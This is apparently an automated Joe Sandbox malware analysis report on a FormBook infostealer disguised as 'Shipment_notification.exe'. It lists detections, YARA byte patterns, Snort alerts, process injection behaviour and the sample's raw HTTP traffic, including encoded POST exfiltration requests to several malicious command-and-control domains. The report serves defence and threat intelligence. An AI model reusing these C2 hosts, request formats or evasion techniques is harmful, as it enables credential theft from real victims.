Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Shipment_notification.exe

Overview

General Information

Sample Name:Shipment_notification.exe
Analysis ID:830738
MD5:c310a64af890ac32abff89e86cb53a33
SHA1:509cdec4d058011fb55535a936e56d3158f3f05a
SHA256:90e86051c2fb04a3f6fda85273580abca9a9131fb5e32065f620c4410febe1af
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Deletes itself after installation
Modifies the context of a thread in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • Shipment_notification.exe (PID: 1348 cmdline: C:\Users\user\Desktop\Shipment_notification.exe MD5: C310A64AF890AC32ABFF89E86CB53A33)
    • Shipment_notification.exe (PID: 2344 cmdline: C:\Users\user\Desktop\Shipment_notification.exe MD5: C310A64AF890AC32ABFF89E86CB53A33)
    • Shipment_notification.exe (PID: 3968 cmdline: C:\Users\user\Desktop\Shipment_notification.exe MD5: C310A64AF890AC32ABFF89E86CB53A33)
      • explorer.exe (PID: 3324 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • control.exe (PID: 4412 cmdline: C:\Windows\SysWOW64\control.exe MD5: 40FBA3FBFD5E33E0DE1BA45472FDA66F)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.377445989.0000000001510000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000002.00000002.377445989.0000000001510000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x1f0d0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0xae3f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x182e7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
    00000002.00000002.377445989.0000000001510000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x180e5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x17b81:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x181e7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1835f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xaa0a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x16dcc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x1de77:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ee2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x20e53:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xcbc2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x1a06a:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      Click to see the 10 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      2.2.Shipment_notification.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        2.2.Shipment_notification.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
        • 0x20053:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0xbdc2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        • 0x1926a:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
        2.2.Shipment_notification.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x19068:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x18b04:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x1916a:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x192e2:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xb98d:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x17d4f:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x1edfa:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1fdad:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        2.2.Shipment_notification.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.Shipment_notification.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x20e53:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0xcbc2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x1a06a:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          Click to see the 1 entries

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          Timestamp:192.168.2.5198.177.124.5749706802031453 03/20/23-16:50:29.247456
          SID:2031453
          Source Port:49706
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.5199.59.243.22349702802031453 03/20/23-16:50:05.917395
          SID:2031453
          Source Port:49702
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.5198.177.124.5749706802031412 03/20/23-16:50:29.247456
          SID:2031412
          Source Port:49706
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.5154.218.155.849704802031453 03/20/23-16:50:21.020230
          SID:2031453
          Source Port:49704
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.5198.177.124.5749706802031449 03/20/23-16:50:29.247456
          SID:2031449
          Source Port:49706
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.5154.218.155.849704802031412 03/20/23-16:50:21.020230
          SID:2031412
          Source Port:49704
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.5199.59.243.22349702802031449 03/20/23-16:50:05.917395
          SID:2031449
          Source Port:49702
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.5154.218.155.849704802031449 03/20/23-16:50:21.020230
          SID:2031449
          Source Port:49704
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.5199.59.243.22349702802031412 03/20/23-16:50:05.917395
          SID:2031412
          Source Port:49702
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Multi AV Scanner detection for submitted file
          Source: Shipment_notification.exeReversingLabs: Detection: 39%
          Source: Shipment_notification.exeVirustotal: Detection: 43%Perma Link
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.Shipment_notification.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.Shipment_notification.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000002.377445989.0000000001510000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.580922850.0000000003170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.578168386.0000000002E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.577613473.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Antivirus detection for URL or domain
          Source: http://www.searchvity.com/?dn=URL Reputation: Label: malware
          Source: http://www.ywtxsm.com/rs5b/PrAvira URL Cloud: Label: malware
          Source: http://www.searchvity.com/URL Reputation: Label: malware
          Source: http://www.peramid.xyz/rs5b/?uyxvg=pPgXS4BiopaVkxB77nB8m5BmJKRgxbtyTgQ51TCNvvWiqwh2ZJ0SiqT/1xVf5TTVOW5skWvYLryZyUzfOZLrBqpWBEotOTgmwg==&L6HRe=HinkmsLDjhAAvira URL Cloud: Label: malware
          Source: http://www.isabellagambitta.com/rs5b/?uyxvg=CsXC0bU6YgbK4v/ikUAvira URL Cloud: Label: phishing
          Source: http://www.drkathleensanders.com/rs5b/Avira URL Cloud: Label: malware
          Source: http://www.peramid.xyz/rs5b/Avira URL Cloud: Label: malware
          Source: http://www.piergitarshoes.com/rs5b/Avira URL Cloud: Label: malware
          Source: http://www.amirah.cfdAvira URL Cloud: Label: phishing
          Source: http://www.amirah.cfd/rs5b/Avira URL Cloud: Label: malware
          Source: http://www.ywtxsm.com/rs5b/Avira URL Cloud: Label: malware
          Source: http://www.locationsbormes.com/rs5b/?uyxvg=5nmvRd2KsNrJ1ILohWvWv9G51OYC+JQySj/wVW5HrbzlASqN8826SlrC1uxl2FZ0KA9XHqewj3KetP3L0XT9wGstOg81NIph5g==&L6HRe=HinkmsLDjhAAvira URL Cloud: Label: malware
          Source: http://www.isabellagambitta.com/rs5b/?uyxvg=CsXC0bU6YgbK4v/ikU+FR3ZDcTynpB6gZNcuxnLmHu8DrupdLy2Rvx2rp5ka04f5VlwEigsTcDnoyRb/ht4uYCIEoQzcZzfMnw==&L6HRe=HinkmsLDjhAAvira URL Cloud: Label: phishing
          Source: http://www.isabellagambitta.com/rs5b/Avira URL Cloud: Label: phishing
          Source: http://www.ywtxsm.com/rs5b/?uyxvg=CESO3iylK7QUfFCiUFLwHXxmSIHW1gBrGCjGxLpE4g3q3SI6yIOiTvn7qrQa9OdkrAgYihNybI2hWOHGXNYRIortSIS8Lcg0Kg==&L6HRe=HinkmsLDjhAAvira URL Cloud: Label: malware
          Source: http://www.peramid.xyzAvira URL Cloud: Label: malware
          Source: http://www.53876.worldAvira URL Cloud: Label: malware
          Source: http://www.drkathleensanders.com/rs5b/?uyxvg=Sr3AwP9Ski0v59cQ3JwcPDLo9I+EFZxtPOrHknZVg/8QV/fIqaYOT5hsTQMwMe6TSfps7iDWaOg2o/5pI6PYy1hDK243b9ADKw==&L6HRe=HinkmsLDjhAAvira URL Cloud: Label: malware
          Source: http://www.53876.world/rs5b/Avira URL Cloud: Label: malware
          Source: http://www.locationsbormes.com/rs5b/Avira URL Cloud: Label: malware
          Source: http://www.carcosainvest.com/rs5b/Avira URL Cloud: Label: malware
          Machine Learning detection for sample
          Source: Shipment_notification.exeJoe Sandbox ML: detected
          Source: 2.2.Shipment_notification.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: Shipment_notification.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: Shipment_notification.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: CYYO.pdb source: Shipment_notification.exe
          Source: Binary string: wntdll.pdbUGP source: Shipment_notification.exe, 00000002.00000003.336325695.0000000001924000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000002.00000003.333262180.0000000001790000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000004.00000002.581558007.0000000004C0F000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000004.00000003.377463775.00000000047C0000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000004.00000002.581558007.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000004.00000003.379237530.0000000004950000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: control.pdb source: Shipment_notification.exe, 00000002.00000002.378125022.0000000001A80000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: Shipment_notification.exe, Shipment_notification.exe, 00000002.00000003.336325695.0000000001924000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000002.00000003.333262180.0000000001790000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000004.00000002.581558007.0000000004C0F000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000004.00000003.377463775.00000000047C0000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000004.00000002.581558007.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000004.00000003.379237530.0000000004950000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: CYYO.pdbSHA256 source: Shipment_notification.exe
          Source: Binary string: control.pdbUGP source: Shipment_notification.exe, 00000002.00000002.378125022.0000000001A80000.00000040.10000000.00040000.00000000.sdmp

          Networking

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 206.54.190.30 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 154.218.155.8 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.tcatelier.com
          Source: C:\Windows\explorer.exeNetwork Connect: 199.59.243.223 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 45.114.105.2 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.carcosainvest.com
          Source: C:\Windows\explorer.exeDomain query: www.locationsbormes.com
          Source: C:\Windows\explorer.exeDomain query: www.peramid.xyz
          Source: C:\Windows\explorer.exeNetwork Connect: 198.177.124.57 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.piergitarshoes.com
          Source: C:\Windows\explorer.exeDomain query: www.emagrecarapido.store
          Source: C:\Windows\explorer.exeDomain query: www.isabellagambitta.com
          Source: C:\Windows\explorer.exeNetwork Connect: 185.27.134.217 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 66.96.161.158 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.ywtxsm.com
          Source: C:\Windows\explorer.exeDomain query: www.amirah.cfd
          Source: C:\Windows\explorer.exeDomain query: www.drkathleensanders.com
          Snort IDS alert for network traffic
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49702 -> 199.59.243.223:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49702 -> 199.59.243.223:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49702 -> 199.59.243.223:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49704 -> 154.218.155.8:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49704 -> 154.218.155.8:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49704 -> 154.218.155.8:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49706 -> 198.177.124.57:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49706 -> 198.177.124.57:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49706 -> 198.177.124.57:80
          Performs DNS queries to domains with low reputation
          Source: C:\Windows\explorer.exeDNS query: www.peramid.xyz
          Source: Joe Sandbox ViewASN Name: FINALFRONTIERVG FINALFRONTIERVG
          Source: Joe Sandbox ViewASN Name: WZCOM-US WZCOM-US
          Source: global trafficHTTP traffic detected: GET /rs5b/?uyxvg=CsXC0bU6YgbK4v/ikU+FR3ZDcTynpB6gZNcuxnLmHu8DrupdLy2Rvx2rp5ka04f5VlwEigsTcDnoyRb/ht4uYCIEoQzcZzfMnw==&L6HRe=HinkmsLDjhA HTTP/1.1Host: www.isabellagambitta.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /rs5b/?uyxvg=Sr3AwP9Ski0v59cQ3JwcPDLo9I+EFZxtPOrHknZVg/8QV/fIqaYOT5hsTQMwMe6TSfps7iDWaOg2o/5pI6PYy1hDK243b9ADKw==&L6HRe=HinkmsLDjhA HTTP/1.1Host: www.drkathleensanders.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /rs5b/?uyxvg=nOUSwineJuxPGPhQvt4EE68jEsCX+f+F3Zzf53EwbVXghGVs+qBfV9lnV789trdHPD+OYXwXTJgtqB6myIQJ1SqB2q7gB4Y0Vw==&L6HRe=HinkmsLDjhA HTTP/1.1Host: www.carcosainvest.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /rs5b/?uyxvg=zhbsihX/pGFJaZpy6dND3H78PJ7JxpKHxXOuen1DNaNorGCumHf7SvafvJLlAK1tbLNpDx0WdS8kjnRSnmRz/gORsH5hLjUWLg==&L6HRe=HinkmsLDjhA HTTP/1.1Host: www.piergitarshoes.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /rs5b/?uyxvg=CESO3iylK7QUfFCiUFLwHXxmSIHW1gBrGCjGxLpE4g3q3SI6yIOiTvn7qrQa9OdkrAgYihNybI2hWOHGXNYRIortSIS8Lcg0Kg==&L6HRe=HinkmsLDjhA HTTP/1.1Host: www.ywtxsm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /rs5b/?uyxvg=pPgXS4BiopaVkxB77nB8m5BmJKRgxbtyTgQ51TCNvvWiqwh2ZJ0SiqT/1xVf5TTVOW5skWvYLryZyUzfOZLrBqpWBEotOTgmwg==&L6HRe=HinkmsLDjhA HTTP/1.1Host: www.peramid.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /rs5b/?uyxvg=5nmvRd2KsNrJ1ILohWvWv9G51OYC+JQySj/wVW5HrbzlASqN8826SlrC1uxl2FZ0KA9XHqewj3KetP3L0XT9wGstOg81NIph5g==&L6HRe=HinkmsLDjhA HTTP/1.1Host: www.locationsbormes.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: POST /rs5b/ HTTP/1.1Host: www.drkathleensanders.comConnection: closeContent-Length: 187Cache-Control: no-cacheOrigin: http://www.drkathleensanders.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.drkathleensanders.com/rs5b/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 75 79 78 76 67 3d 66 70 66 67 7a 34 4e 43 73 48 6c 68 7e 65 63 75 77 4a 74 64 64 68 50 6d 32 62 50 51 50 62 52 4e 42 73 7a 41 68 44 35 47 76 50 34 5a 63 75 37 6a 6c 62 46 37 55 38 67 6e 62 44 30 6d 42 5a 7e 41 4c 65 63 52 79 43 58 65 4e 74 34 6b 6c 39 6c 77 55 4b 37 41 75 56 35 58 66 6b 77 51 65 75 30 61 43 7a 69 65 73 53 47 4e 66 68 7a 34 6e 43 61 56 4e 30 43 6d 75 63 39 56 7e 32 6e 4d 37 4b 4b 44 7e 65 79 67 6e 73 6d 4d 77 58 68 77 47 4b 68 65 33 4b 47 72 52 78 49 43 5a 49 7e 6b 4d 72 43 4d 6c 43 73 7a 32 37 59 43 28 74 58 35 49 44 65 38 43 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: uyxvg=fpfgz4NCsHlh~ecuwJtddhPm2bPQPbRNBszAhD5GvP4Zcu7jlbF7U8gnbD0mBZ~ALecRyCXeNt4kl9lwUK7AuV5XfkwQeu0aCziesSGNfhz4nCaVN0Cmuc9V~2nM7KKD~eygnsmMwXhwGKhe3KGrRxICZI~kMrCMlCsz27YC(tX5IDe8CA).
          Source: global trafficHTTP traffic detected: POST /rs5b/ HTTP/1.1Host: www.carcosainvest.comConnection: closeContent-Length: 187Cache-Control: no-cacheOrigin: http://www.carcosainvest.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.carcosainvest.com/rs5b/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 75 79 78 76 67 3d 71 4d 38 79 7a 57 54 77 55 4a 41 42 4c 39 4a 59 6b 2d 38 44 5a 34 4d 5f 54 66 79 45 38 38 7e 44 37 73 37 4e 7e 45 63 5a 58 6b 58 6b 70 33 31 6c 7e 4c 35 76 55 39 64 7a 4b 4b 41 51 70 70 42 45 49 54 72 35 65 54 41 50 54 72 30 35 67 44 32 4d 76 62 49 37 72 41 57 43 6f 4a 6a 69 55 2d 38 52 54 4f 4d 4c 7e 34 57 53 4e 4a 73 7a 71 75 6c 30 48 4c 65 6f 33 5f 43 51 66 69 28 51 63 73 35 7a 70 58 59 49 37 77 79 46 77 4a 72 64 65 71 28 53 32 61 57 5f 77 56 63 71 36 38 46 77 45 46 57 4e 67 67 52 5f 65 54 6a 64 6c 56 39 4d 79 6e 47 50 49 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: uyxvg=qM8yzWTwUJABL9JYk-8DZ4M_TfyE88~D7s7N~EcZXkXkp31l~L5vU9dzKKAQppBEITr5eTAPTr05gD2MvbI7rAWCoJjiU-8RTOML~4WSNJszqul0HLeo3_CQfi(Qcs5zpXYI7wyFwJrdeq(S2aW_wVcq68FwEFWNggR_eTjdlV9MynGPIg).
          Source: global trafficHTTP traffic detected: POST /rs5b/ HTTP/1.1Host: www.piergitarshoes.comConnection: closeContent-Length: 187Cache-Control: no-cacheOrigin: http://www.piergitarshoes.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.piergitarshoes.com/rs5b/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 75 79 78 76 67 3d 7e 6a 7a 4d 68 55 53 42 31 53 6c 4b 58 34 70 66 36 72 63 33 71 6e 54 4d 49 49 61 59 7e 6f 7e 41 69 46 47 35 65 45 4a 54 44 62 46 74 39 45 4b 6c 33 33 76 75 4d 73 66 55 76 37 62 61 44 61 70 32 4d 4c 59 50 43 51 51 5f 4c 69 67 31 73 43 31 77 30 44 74 75 6e 7a 4f 72 70 32 68 4a 46 69 6f 4d 4c 4b 34 46 4b 78 48 4f 51 71 6d 4a 6c 34 44 4f 51 79 46 62 6d 4e 67 5f 34 51 50 33 47 79 71 59 37 4f 68 6a 49 59 39 34 42 7a 5a 4c 71 6a 31 64 51 33 34 48 4f 69 39 44 46 6f 59 72 38 77 57 54 28 34 6d 51 51 77 7a 62 71 73 6e 37 6a 7a 4a 59 35 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: uyxvg=~jzMhUSB1SlKX4pf6rc3qnTMIIaY~o~AiFG5eEJTDbFt9EKl33vuMsfUv7baDap2MLYPCQQ_Lig1sC1w0DtunzOrp2hJFioMLK4FKxHOQqmJl4DOQyFbmNg_4QP3GyqY7OhjIY94BzZLqj1dQ34HOi9DFoYr8wWT(4mQQwzbqsn7jzJY5g).
          Source: global trafficHTTP traffic detected: POST /rs5b/ HTTP/1.1Host: www.ywtxsm.comConnection: closeContent-Length: 187Cache-Control: no-cacheOrigin: http://www.ywtxsm.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.ywtxsm.com/rs5b/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 75 79 78 76 67 3d 50 47 36 75 30 55 43 37 51 4e 52 56 53 32 47 4a 65 45 36 54 64 48 56 4b 51 63 4c 6d 38 69 46 35 4b 68 72 68 34 70 35 58 31 68 37 7a 79 51 30 4c 28 35 6a 4d 56 66 28 6a 74 5a 55 55 32 59 35 39 39 42 6c 77 76 68 35 53 61 59 32 7a 5a 73 44 4b 57 39 5a 49 5a 4c 58 54 4d 70 6e 76 65 75 49 48 54 49 66 50 56 33 59 4e 38 66 62 61 42 6d 4c 32 4f 45 4e 77 69 69 69 58 4d 4e 34 4d 78 5a 6e 68 30 6c 62 35 72 6d 39 79 31 6b 56 6c 73 30 79 69 77 63 61 41 4b 54 36 79 59 78 6a 42 42 52 6d 51 77 49 48 64 72 77 37 43 42 73 58 41 34 30 72 58 66 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: uyxvg=PG6u0UC7QNRVS2GJeE6TdHVKQcLm8iF5Khrh4p5X1h7zyQ0L(5jMVf(jtZUU2Y599Blwvh5SaY2zZsDKW9ZIZLXTMpnveuIHTIfPV3YN8fbaBmL2OENwiiiXMN4MxZnh0lb5rm9y1kVls0yiwcaAKT6yYxjBBRmQwIHdrw7CBsXA40rXfQ).
          Source: global trafficHTTP traffic detected: POST /rs5b/ HTTP/1.1Host: www.peramid.xyzConnection: closeContent-Length: 187Cache-Control: no-cacheOrigin: http://www.peramid.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.peramid.xyz/rs5b/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 75 79 78 76 67 3d 6b 4e 49 33 52 4d 52 50 72 2d 32 47 68 42 4a 56 37 6b 51 76 38 65 6c 30 46 72 73 77 79 61 70 38 57 56 55 6f 38 77 6d 63 70 74 71 6e 6a 45 35 41 52 4f 45 5a 74 71 37 46 74 54 4e 49 28 78 44 55 61 6c 73 70 6e 33 28 37 56 70 61 79 7a 6c 6a 58 59 72 4c 30 51 35 46 7a 53 6d 49 73 4e 78 55 5f 37 2d 56 34 4c 36 71 36 73 61 70 79 32 4f 65 57 32 74 46 57 66 7a 5a 6e 56 50 4d 55 52 75 44 41 7e 50 65 4c 34 61 74 77 6e 52 31 4b 79 41 63 71 6a 32 77 67 57 44 38 75 43 6f 58 6f 33 4d 7e 44 41 45 62 73 37 46 69 45 68 65 54 75 66 66 54 4c 4f 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: uyxvg=kNI3RMRPr-2GhBJV7kQv8el0Frswyap8WVUo8wmcptqnjE5AROEZtq7FtTNI(xDUalspn3(7VpayzljXYrL0Q5FzSmIsNxU_7-V4L6q6sapy2OeW2tFWfzZnVPMURuDA~PeL4atwnR1KyAcqj2wgWD8uCoXo3M~DAEbs7FiEheTuffTLOw).
